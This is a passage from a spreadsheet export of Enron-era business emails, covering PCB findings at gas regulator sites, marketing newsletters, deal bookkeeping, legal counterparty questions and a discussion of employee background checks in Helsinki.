made to SoCal by Kern River (remember that Ralph told us that SoCal had heard _x000D_
that some condensate from Kern River had been turned back to them by _x000D_
Evergreen due to the fact that it was "hot" with PCB's)?  I would like to _x000D_
chat a little about your thoughts on this when you get a minute.  John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Larry Campbell_x000D_
12/12/2000 03:26 PM_x000D_
To: Louis Soldano/ET&amp;S/Enron@Enron, John Shafer/OTS/Enron@Enron_x000D_
cc: William Kendrick/OTS/Enron@Enron, Rich Jolly/ET&amp;S/Enron@Enron, Randy _x000D_
Rice/OTS/Enron@ENRON _x000D_
_x000D_
Subject: Discoveries of PCB's on Regulator Sites on Southwest Gas_x000D_
_x000D_
I received a call from Ralph Komai, PCB person for SoCal concerning new hits _x000D_
of PCBs at regulator sites on the Southwest Gas system.  It appears that SWG _x000D_
did some liquids sampling at two regulator locations near Victorville, Ca. _x000D_
and found small volumes of liquid accumulations (less than 2 oz.).  They _x000D_
tested the liquid for PCBs and found concentrations of 230 and 132 ppm.  The _x000D_
aroclors for the two samples were not known at the time of Ralph's _x000D_
notification to me but he stated that SWG plans to do further testing at _x000D_
their other 17 regulator locations.  This additional testing will be _x000D_
conducted in the near future and Ralph stated that he would share the results _x000D_
of his sampling with me.  It should be noted that the location of the two _x000D_
positive hits  were immediately downstream of where SoCal delivers gas to _x000D_
SWG. _x000D_
_x000D_
If we need to discuss this further, contact me at my home  (505) 624-0353 as _x000D_
I am taking vacation during the month of December. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 09:16:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'continentalvacations@lists.coolvacations.com'})</t>
  </si>
  <si>
    <t>Continental Airlines Vacations Special Deals</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Eric,_x000D_
_x000D_
Enjoy great savings on your next Continental Airlines Vacation with_x000D_
these Special Deals!_x000D_
_x000D_
5,000 FREE ONEPASS BONUS MILES_x000D_
******************************_x000D_
Book a ski package for 5 nights or longer and you can earn 5,000 FREE_x000D_
OnePass Bonus Miles on Continental Airlines. _x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.1.ebass*Denron*Pcom_x000D_
_x000D_
Take advantage of this offer and plan a vacation to _x000D_
BORDERS LODGE in Beaver Creek, Colorado:  These moderate to deluxe_x000D_
condominiums are conveniently close to both the outstanding slopes and_x000D_
the excellent shops and restaurants of charming Beaver Creek Village. _x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.2.ebass*Denron*Pcom_x000D_
_x000D_
_x000D_
SAVE UP TO $50 WHEN YOU BOOK ONLINE!_x000D_
************************************_x000D_
Book a vacation package ONLINE by December 31, 2001 and save up to $50!_x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.3.ebass*Denron*Pcom_x000D_
_x000D_
Enjoy the savings of this ONLINE booking bonus and plan a trip to Grand_x000D_
Cayman!_x000D_
_x000D_
Experience Grand Cayman's spectacular natural beauty. The birthplace of_x000D_
scuba diving, Grand Cayman's world famous underwater scenery features an_x000D_
incredible diversity of tropical fish. _x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.4.ebass*Denron*Pcom_x000D_
_x000D_
SAVE UP TO $600 ON YOUR NASSAU VACATION_x000D_
***************************************_x000D_
To kick off our new non-stop service from Houston and Cleveland to_x000D_
Nassau, SuperClubs Breezes Bahamas Resort and Radisson Cable Beach_x000D_
Resort are offering super rate reductions when you book a 3 night_x000D_
vacation package!_x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.5.ebass*Denron*Pcom_x000D_
_x000D_
A World of Choices Awaits You!_x000D_
_x000D_
Julie _x000D_
Your Internet Travel Guru _x000D_
_x000D_
P.S. _x000D_
Our TRAVEL PROTECTION PLAN allows you to cancel for any reason._x000D_
_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.6.ebass*Denron*Pcom_x000D_
_x000D_
Please click here to update your travel profile: _x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.7.ebass*Denron*Pcom_x000D_
_x000D_
************************************************************_x000D_
              This is a post-only mailing._x000D_
    PLEASE DO NOT ATTEMPT TO RESPOND TO THIS MESSAGE._x000D_
************************************************************_x000D_
_x000D_
-----------------------UNSUBSCRIBE--------------------------_x000D_
_x000D_
To unsubscribe from the list, please click on this link to your_x000D_
http://lists.coolvacations.com/UM/T.ASP?A41.53.10.7.ebass*Denron*Pcom_x000D_
_x000D_
Please log in with your email and password. Once you have accessed your_x000D_
Travel Profile, please clear the checkbox for "receiving emails" located_x000D_
at the bottom of the page._x000D_
_x000D_
We apologize if this email has reached you in error._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.miller@enron.com', 'bcantre@ect.enron.com', 'julie.gomez@enron.com', 'drew.fossum@enron.com', 'richard.shapiro@enron.com', 'dfulton@enron.com', 'leslie.lawner@enron.com', 'stephanie.miller@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Marketing Affiliate Statistics</t>
  </si>
  <si>
    <t xml:space="preserve"> Attached are some slides that INGAA recently put together to demonstrate _x000D_
that (1) marketing affiliates do not hold capacity solely on affiliated _x000D_
pipelines and (2) that marketing affiliates receive discounts that are _x000D_
comparable to the discounts given to marketers as a class._x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 09:47:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'weborders@www.hallmark.com'})</t>
  </si>
  <si>
    <t>Your Hallmark order confirmation - WEB13665566</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
Dear Shelley,_x000D_
_x000D_
Thank you for shopping at Hallmark. Here's a recap of your order according to our records:_x000D_
_x000D_
Order Number: WEB13665566_x000D_
Order Date: 02/07/2002_x000D_
Total Order Amount: $74.90_x000D_
_x000D_
We'll send another note when the shipment goes out._x000D_
_x000D_
If you need more information, click here to use our self-help:_x000D_
http://help.ecards.hallmark.com/cgi-bin/rightnow/ _x000D_
or click the Customer Service link on Hallmark.com._x000D_
_x000D_
                                             ***************_x000D_
If you placed your order on Hallmark.com and would like to check the status, go to Hallmark.com and click the "Order Status" link. _x000D_
_x000D_
If you are a Hallmark.com member, enter your username and password, click on "get previous orders," and then click the order number._x000D_
_x000D_
If you are not a member, first enter the order number and your e-mail address, then click "order status."_x000D_
_x000D_
If you placed your order by phone, or would simply prefer to call to check your order status, you can call us at 1-800-Hallmark (1-800-425-5627). It will help if you have your order number handy. We are open Monday through Friday 8 am - 7 pm, Saturday 9 am - 7 pm and we are closed on Sunday._x000D_
_x000D_
                                             ***************_x000D_
_x000D_
Don't forget to visit Hallmark.com whenever you need great gifts for everyone on your list. You'll find gourmet desserts, Hallmark collectibles, cards and more. And fresh-cut Hallmark Flowers add beauty to any occasion, in any season. Be sure to visit us often to see our newest products and special offers._x000D_
_x000D_
Need a great gift at the very last minute? Attach  a Gift Wish Certificate to an e-card, and your recipient can redeem it for gift certificates from over 300 stores, restaurants and services. It's fast and it's easy, and it's only at Hallmark.com._x000D_
http://www.hallmark.com_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
Jody Ellis_x000D_
The Hallmark Team</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 13:57:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'louise.kitchen@enron.com', 'david.gorte@enron.com', 'london.brown@enron.com', 'jeffrey.mcmahon@enron.com', 'a..shankman@enron.com', 'raymond.bowen@enron.com', 'rick.buy@enron.com', 'john.lavorato@enron.com', 'mike.mcconnell@enron.com'})</t>
  </si>
  <si>
    <t>Enron Wholesale Services - Investment Watch Report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Attached for your information is the latest version of the Watch Report that RAC maintains for EWS.  The format has been revised to a more streamlined two page report.  If you have questions or comments, please call me at ext. 3-3905.  Regards,   Rick C._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sun, 10 Dec 2000 19:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'csleuth@infonautics.com'})</t>
  </si>
  <si>
    <t>Company Sleuth Daily Report for ALEWIS34</t>
  </si>
  <si>
    <t>Company Sleuth Daily Report_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D_x000D_
Company Sleuth is a registered trademark of Infonautics, Inc. (Nasdaq: INFO=_x000D_
)=20_x000D_
or its subsidiaries._x000D_
_x000D_
CompanySleuth has revised its Privacy Policy.  Click here =20_x000D_
http://www.company.sleuth.com/priv-acqui.cfm to view the revised Privacy=20_x000D_
Policy._x000D_
_x000D_
This is your Personal Company Sleuth Report for Monday December 11, 2000._x000D_
_x000D_
----------------------_x000D_
Your Stakeout Companies_x000D_
-----------------------_x000D_
Here are the new items Company Sleuth found on your stakeout companies last=_x000D_
=20_x000D_
night._x000D_
_x000D_
mPhase Technologies, Inc. (XDSL)_x000D_
Raging Bull Msg.................41_x000D_
To view this company's report, go to:_x000D_
http://www.company.sleuth.com/index.cfm?ticker=3DXDSL_x000D_
_x000D_
Ameritrade Holding Corp. (AMTD)_x000D_
Raging Bull Msg.................8_x000D_
Yahoo Msg.......................22_x000D_
To view this company's report, go to:_x000D_
http://www.company.sleuth.com/index.cfm?ticker=3DAMTD_x000D_
_x000D_
Best Buy Company, Inc. (BBY)_x000D_
Yahoo Msg.......................20_x000D_
Motley Fool Msg.................1_x000D_
To view this company's report, go to:_x000D_
http://www.company.sleuth.com/index.cfm?ticker=3DBBY_x000D_
_x000D_
Starnet Comm. Intl., Inc. (SNMM)_x000D_
Raging Bull Msg.................43_x000D_
CNBC Msg........................1_x000D_
To view this company's report, go to:_x000D_
http://www.company.sleuth.com/index.cfm?ticker=3DSNMM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Company Sleuth Offers_x000D_
---------------------------_x000D_
Charge Offs? No Pays? Slow Pays? No Credit? - NO PROBLEM!_x000D_
You can establish or reestablish your credit with a brand new MasterCard in=_x000D_
=20_x000D_
your name. There are NO Credit Checks and NO Credit Turndowns plus=20_x000D_
GUARANTEED* Instant Online APPROVAL!_x000D_
http://L90Dm.com/rdr/294/companys_x000D_
_x000D_
Establish or Re-Establish your good credit with an Unsecured VISA card from=_x000D_
=20_x000D_
First PREMIER Bank!_x000D_
_x000D_
Get a Credit Limit up to $1000 + Cash Advances + Future Credit Line increas=_x000D_
es=20_x000D_
in as little as 6 months!_x000D_
http://L90Dm.com/rdr/573/Premier_Visa_x000D_
_x000D_
Click here for a FREE Motorola Pager!_x000D_
http://www.company.sleuth.com/motorola/motorola.htm_x000D_
_x000D_
The sales professional is the most important part of any organization!_x000D_
Stay on top of your game with the free 'just sell' newsletter from your sal=_x000D_
es=20_x000D_
&amp; marketing portal-- justsell.com. To receive these incredible business lea=_x000D_
ds=20_x000D_
and a daily update of jobs in your profession, complete the Job Sleuth=20_x000D_
registration form and click "Just Sell" in the special offers section._x000D_
http://www.job.sleuth.com/register.cfm?refid=3D3005_x000D_
_x000D_
_x000D_
Company Sleuth Holiday Edition_x000D_
-------------------------------------_x000D_
With the holidays just around the corner, many of us find ourselves setting=_x000D_
=20_x000D_
goals for the new year - both personal and financial.   Company Sleuth is=_x000D_
=20_x000D_
pleased to bring to you the Company Sleuth Holiday Edition - a limited=20_x000D_
edition, weekly newsletter providing you with helpful information and insig=_x000D_
ht=20_x000D_
to help you take advantage of opportunities during this holiday season. =20_x000D_
Check out these weekly newsletters at:_x000D_
_x000D_
For the Person Who Has It All -=20_x000D_
http://www.company.sleuth.com/holiday/index.html_x000D_
Savvy Online Shopping - http://www.company.sleuth.com/holiday/111500.html_x000D_
Managing Holiday Spending - http://www.company.sleuth.com/holiday/110800.ht=_x000D_
ml_x000D_
Holiday Travel - http://www.company.sleuth.com/holiday/110100.html_x000D_
_x000D_
About Company Sleuth_x000D_
--------------------_x000D_
"=01(Company Sleuth electronically tracks companies of your choosing on wha=_x000D_
t=01,s=20_x000D_
called the Stakeout List. The Stakeout List includes some obscurities such =_x000D_
as=20_x000D_
domain name registrations and patents as well as more run-of-the-mill=20_x000D_
information such as insider trades, news, and broker reports. The number of=_x000D_
=20_x000D_
message board postings on a stock is displayed in a chart, indicating wheth=_x000D_
er=20_x000D_
the buzz is heating up or petering out. You don=01,t even need to visit the=_x000D_
 site=20_x000D_
regularly=01*Company Sleuth will e-mail the results so you can pick and cho=_x000D_
ose=20_x000D_
what to read."_x000D_
- =01&amp;13 Sites That Put You Above The Crowd=018 by Paul Barr, OnlineInvesto=_x000D_
r,=20_x000D_
November 2000_x000D_
_x000D_
_x000D_
Customize Company Sleuth_x000D_
------------------------_x000D_
CompanySleuth has revised its Privacy Policy.  Click here =20_x000D_
http://www.company.sleuth.com/priv-acqui.cfm to view the revised Privacy=20_x000D_
Policy._x000D_
_x000D_
Cancel E-mail_x000D_
http://www.company.sleuth.com/cancelmail.cfm?userid=3DALEWIS34_x000D_
_x000D_
Contact Company Sleuth_x000D_
http://www.company.sleuth.com/contact-us.cfm_x000D_
_x000D_
Change Stakeout Companies_x000D_
http://www.company.sleuth.com/PickCompanies.cfm_x000D_
_x000D_
Modify E-mail Content_x000D_
http://www.company.sleuth.com/tab-alerts.cfm_x000D_
_x000D_
Change to HTML E-mail_x000D_
http://www.company.sleuth.com/change-mail-format.cfm_x000D_
_x000D_
_x000D_
Company Sleuth is a registered trademark of Infonautics, Inc. (Nasdaq: INFO=_x000D_
)=20_x000D_
or its subsidiaries._x000D_
Copyright 2000 Infonautics Corporation http://www.infonautics.com</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 06:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Northwestern</t>
  </si>
  <si>
    <t xml:space="preserve">I kinda like Coyote LLC and Black Hills LLC (no spruce)._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris Booth                           03/12/2001 02:20 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Northwestern  _x000D_
_x000D_
Rushmore LLC (Mt Rushmore)_x000D_
Rose Quartz LLC (State mineral)_x000D_
Humming Bee LLC (State insect)_x000D_
Coyote LLC (University of SD mascot)_x000D_
Black Hills Spruce LLC (State tree)_x000D_
Walleye LLC (State Fish)_x000D_
_x000D_
This is already more than I ever wanted to know about SD._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
03/12/2001 12:59 PM_x000D_
To: Chris Booth/NA/Enron@Enron, Ben Jacoby/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Northwestern_x000D_
_x000D_
We need a name for the LLC for this transaction.  Any suggestions?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 00:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CES Deals</t>
  </si>
  <si>
    <t xml:space="preserve">Hey, regarding deals 226462 and 258420, should we take the volumes to 0 on _x000D_
deal 226462?_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 05/04/2000 07:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Victor Lamadrid_x000D_
05/03/2000 05:40 PM_x000D_
To: Chris Germany/HOU/ECT@ECT, Molly Johnson/HOU/ECT@ECT, Scott _x000D_
Goodell/Corp/Enron@ENRON, Dick Jenkins/HOU/ECT@ECT, Sarah _x000D_
Mulholland/HOU/ECT@ECT, Scott Hendrickson/HOU/ECT@ECT, Robert _x000D_
Allwein/HOU/ECT@ECT, Joann Collins/Corp/Enron@ENRON, Joan _x000D_
Veselack/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: CES Deals_x000D_
_x000D_
Look at the TCO deal below for accuracy...._x000D_
---------------------- Forwarded by Victor Lamadrid/HOU/ECT on 05/03/2000 _x000D_
05:36 PM ---------------------------_x000D_
_x000D_
_x000D_
Elizabeth L Hernandez_x000D_
05/03/2000 05:02 PM_x000D_
To: David Oliver/HOU/ECT@ECT, William Kelly/HOU/ECT@ECT, Donna _x000D_
Greif/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT_x000D_
cc: George Smith/HOU/ECT@ECT, Victor Lamadrid/HOU/ECT@ECT _x000D_
Subject: CES Deals_x000D_
_x000D_
The following are deals that I have completed for the CES split.  Please pass _x000D_
along information to Logistics person that nominates on particular pipe.  I _x000D_
have also created the hedge for thos deals that are in red.  Any questions _x000D_
please call me at X3-3048. _x000D_
_x000D_
OLD DEAL #  NEW DEAL #  DESK  PIPE_x000D_
_x000D_
134908   258411   Central  PEPL_x000D_
226462   258420   East  CGAS_x000D_
249183   249183   Central  ANR (Counterparty name change only)_x000D_
140015   258735   Central  ANR_x000D_
139451   258682   Central   ANR_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 06:55:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.studebaker@enron.com'})</t>
  </si>
  <si>
    <t>Segmentation identifier</t>
  </si>
  <si>
    <t xml:space="preserve">Teb, _x000D_
_x000D_
Elizabeth, Nancy, Mary, and Jim would like to discuss with you the segmentation identifier.  Tennessee says that they do not use this for identifying a segmented release from a releasing shipper.   And, I believe that the GISB defintion defines it as something else.  We'll bring the definition with us.  </t>
  </si>
  <si>
    <t>Tue, 1 May 2001 04:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Total</t>
  </si>
  <si>
    <t>Brant:  refresh my memory, please.  do we need to call Lee Jackson?_x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 05/01/2001 10:48 AM -----_x000D_
_x000D_
	Lee Jackson/ENRON@enronXgate_x000D_
	05/01/2001 10:21 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate_x000D_
		 cc: John L Nowlan/HOU/ECT@ECT, Tracy Wallace/LON/ECT@ECT_x000D_
		 Subject: Total_x000D_
_x000D_
All,_x000D_
_x000D_
There seems to be a lot of confusion, on our ability to trade with Total _x000D_
Intl.  Our London group seems to be able to trade with this counterparty on a _x000D_
regular basis, but I understand, we have a legal issue outstanding with _x000D_
Total.  Could I please have further info on why Houston cannot trade with _x000D_
this counterparty._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Lee Jackson</t>
  </si>
  <si>
    <t>frozenset({'richard.dix@gm.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Richard -_x000D_
_x000D_
Thanks so much for providing the below document.  While I appreciate its _x000D_
simplicity, it does not fully satisfy Enron's requirements.  If it is not too _x000D_
much trouble, could you or Kenneth please provide comments to the agreement _x000D_
provided._x000D_
_x000D_
I will be back in my office on Wednesday and can address matters directly _x000D_
with Kenneth or you at that time._x000D_
_x000D_
Mark_x000D_
Senior Counsel, ENA_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3940_x000D_
E-Mail:      Mark.Greenberg@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	richard.dix@gm.com_x000D_
	04/07/2001 07:24 AM_x000D_
		 _x000D_
		 To: Mark.Greenberg@enron.com_x000D_
		 cc: John.Allario@enron.com, Tana.Jones@enron.com, Kay.Young@enron.com, _x000D_
kenneth.wong@gm.com_x000D_
		 Subject: Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
We would propose the following document for proprietary information.  If you_x000D_
have any comments, please contact_x000D_
Ken Wong at Kenneth.Wong@gm.com or 313 974-1348. I will only be available by_x000D_
email until Thursday morning._x000D_
_x000D_
Thanks_x000D_
Richard Dix_x000D_
_x000D_
(See attached file: Proprietary Info-enron.doc)_x000D_
_x000D_
 - Proprietary Info-enron.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 02:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Haina</t>
  </si>
  <si>
    <t>Doug and Rob--- I left a voicemail for Bob Williams that I thought  Jim _x000D_
McCartney would be good. Jim is an outside atty who consults with me and Bob _x000D_
on complex litigation. He would be a perfect nuetral arbitrator.</t>
  </si>
  <si>
    <t>Wed, 20 Feb 2002 09:06:43 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: FW: Media Coverage of Enron</t>
  </si>
  <si>
    <t xml:space="preserve">I didn't see myself this a.m., maybe on the evening portion at 5:30pm_x000D_
_x000D_
-----Original Message-----_x000D_
From: Lmfoust@aol.com [mailto:Lmfoust@aol.com]_x000D_
Sent: Wednesday, February 20, 2002 11:05 AM_x000D_
To: Hyatt, Kevin_x000D_
Subject: Re: FW: Media Coverage of Enron_x000D_
_x000D_
_x000D_
Thanks! </t>
  </si>
  <si>
    <t>Thu, 21 Oct 1999 09:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds like a great idea to me!  Sara_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kaye Ellis_x000D_
10/21/99 04:55 PM_x000D_
To: Shari Stack/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Peggy _x000D_
Banczak/HOU/ECT@ECT, Debra Perlingiere/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Vacation_x000D_
_x000D_
I think it is my turn to take a vacation.  I would like to take the week of _x000D_
December 13 off.  I hope this is OK with everyone.  I need to get my request _x000D_
for a temp in ASAP so we can try and get who we want.  Let me know your temp _x000D_
"wish list".  We only have one floor floater and I'm sure several admins will _x000D_
be off if it is like last year.  It is hard for me to believe I have been on _x000D_
the floor a year.  Enough of my sentiment._x000D_
_x000D_
Thanks,_x000D_
Kaye_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 10:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Financial Confirm NP6050.1</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - My reply to Peggy _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 07/19/2000 04:59 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           07/19/2000 04:57 PM_x000D_
	_x000D_
_x000D_
To: Peggy Hedstrom/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Financial Confirm NP6050.1  _x000D_
_x000D_
I got your message and I have asked Brent to get with me when he is back in _x000D_
the office on Friday ( he has been in New York re: MG since Monday night).  _x000D_
Together we will do two things:  (1) devise a foolproof plan to insure an _x000D_
excellent level of service to Calgary starting immediately, and (2) work with _x000D_
Mark Taylor to understand his concerns over the movement of confirmation _x000D_
preparation to Calgary and to eliminate his concerns.  We will keep you _x000D_
posted on both items.  --Sally  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Peggy Hedstrom_x000D_
	07/19/2000 12:02 PM_x000D_
	_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Financial Confirm NP6050.1_x000D_
_x000D_
Just so that you are aware, we continue to have problems with the financial _x000D_
confirm process from Houston.  On more than one occasion, confirmations have _x000D_
been sent to our counterparties prior to review by Calgary.  Attached is the _x000D_
most recent one.   We have been assured over and over that this will not _x000D_
happen again, however, it continues to happen.  Luckily, this confirmation _x000D_
went out without any errors in it.  I know that you are very busy, but  is _x000D_
there any way that you can make it a priority to get resolution on moving the _x000D_
financial confirmations to Calgary.  _x000D_
---------------------- Forwarded by Peggy Hedstrom/CAL/ECT on 07/18/2000 _x000D_
02:10 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Larry Joe Hunter                           07/18/2000 01:15 PM_x000D_
	_x000D_
_x000D_
To: Peggy Hedstrom/CAL/ECT@ECT_x000D_
cc: Diane Anderson/NA/Enron@Enron, Andrea R Guillen/HOU/ECT@ECT _x000D_
Subject: Re: Financial Confirm NP6050.1  _x000D_
_x000D_
Peggy,_x000D_
_x000D_
As far as I can tell, we simply screwed up on this deal.  Diane Anderson, who _x000D_
was covering for Angie last week, was using my name to sign off on some other _x000D_
Canada deals which were approved from last week then signed and sent this one _x000D_
by mistake.  We're terribly sorry for the mistake.  Call me if you want to _x000D_
discuss._x000D_
_x000D_
Thanks,_x000D_
Joe_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Peggy Hedstrom_x000D_
	07/18/2000 09:55 AM_x000D_
	_x000D_
To: Larry Joe Hunter/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Financial Confirm NP6050.1_x000D_
_x000D_
Since Dianne Seib is currently on vacation, I am reviewing the financial _x000D_
confirms.  For the referenced confirm, the status is currently showing 'Sent _x000D_
to Counterparty", although our records show that we have not yet approved the _x000D_
revised confirm.  Can you check on this for me and let me know whether this _x000D_
was sent prior to receiving Calgary's approval?  If you have any questions, I _x000D_
can be contacted at ext. 6753._x000D_
Thanks_x000D_
Peggy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 07:44:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Strategic Management Society Conference</t>
  </si>
  <si>
    <t>thanks Vince - i will get the details to Shirley_x000D_
Unfortunately I am in Asia next week_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vince.J.Kaminski@enron.com [mailto:Vince.J.Kaminski@enron.com]_x000D_
Sent: Tuesday, June 05, 2001 9:15 AM_x000D_
To: macmilli@wharton.upenn.edu_x000D_
Cc: Shirley.Crenshaw@enron.com; Vince.J.Kaminski@enron.com_x000D_
Subject: RE: Strategic Management Society Conference_x000D_
_x000D_
_x000D_
Ian,_x000D_
_x000D_
I shall come to Wharton on Thursday, June 14,_x000D_
meeting with Howard Kunreuther._x000D_
_x000D_
I shall ask my assistant to forward you my itinerary._x000D_
I shall also register for the October Conference._x000D_
Thanks for reminding me._x000D_
_x000D_
Vince_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "MacMillan, Ian" &lt;macmilli@wharton.upenn.edu&gt;@ENRON_x000D_
             [mailto:IMCEANOTES-+22MacMillan+2C+20Ian+22+20+3Cmacmilli+40wharton+2Eupenn+2Eedu+3E+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Tuesday, June 05, 2001 6:48 AM_x000D_
   To:     'vkamins@enron.com'_x000D_
   Cc:     Rita Mcgrath (E-mail); Boisot, Max_x000D_
   Subject:  Strategic Management Society Conference_x000D_
_x000D_
   A couple of months ago you agreed to serve on a panel on real options_x000D_
   that Rita McGrath at Columbia had assembled._x000D_
   We have been informed that you have not registered for the conference -_x000D_
   in SFO October 21 to 24_x000D_
   Can you please register - they are getting antsy about it.  Go to_x000D_
   sms@mgmt.purdue.edu_x000D_
   When are you due at Wharton again?</t>
  </si>
  <si>
    <t>Thu, 24 Feb 2000 10:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Background Checks</t>
  </si>
  <si>
    <t xml:space="preserve">Was it not January when we were back and forth and back and forth to _x000D_
London/Helsinki?  And despite the fact that the date sequence from London _x000D_
looks funny, it would seem that Nigel on the 17th of February is talking _x000D_
about beginning the process (actually debating the process) of background _x000D_
checks?   _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 02/24/2000 06:28 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Steve W Young_x000D_
02/17/2000 03:51 AM_x000D_
To: Ted Murphy/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT _x000D_
Subject: Re: Background Checks_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Steve W Young/LON/ECT on 17/02/2000 09:52 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Steve W Young_x000D_
17/02/2000 09:50_x000D_
To: Nigel Sellens/LON/ECT@ECT_x000D_
cc: John L Nowlan/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Background Checks  _x000D_
_x000D_
If they are still employed (presuming all but Ilkka are still on the payroll) _x000D_
then I believe this should be requested.  As a matter of principal it should _x000D_
have been done for all in the first place and there should be no reason why _x000D_
it could not be done now.  Admittedly the reasons will now be obvious for the _x000D_
request, we can simply tell those checked that it was overlooked originally.  _x000D_
Relative to Ilkka, there is no harm in requesting it as well.  Presuming he _x000D_
won't consent then we can discuss further.  _x000D_
_x000D_
_x000D_
_x000D_
Nigel Sellens_x000D_
17/02/2000 07:41_x000D_
To: Steve W Young/LON/ECT@ECT, John L Nowlan/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Background Checks_x000D_
_x000D_
I have made contact with the security folks in Houston and been advised of _x000D_
what we need to do.  One obvious point is to understand the legal aspects of _x000D_
such a check.  I have now spoken to a Finnish lawyer who has advised that any _x000D_
employee background check (to include credit checks and bank checks) must _x000D_
have the prior written approval of the employee concerned and this would need _x000D_
to be provided to the source of the information before it is handed over._x000D_
_x000D_
I assume we need to re-think whether we want to go down this route given that _x000D_
this check process will now have a very visible profile in the Helsinki _x000D_
office._x000D_
_x000D_
What are your views?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
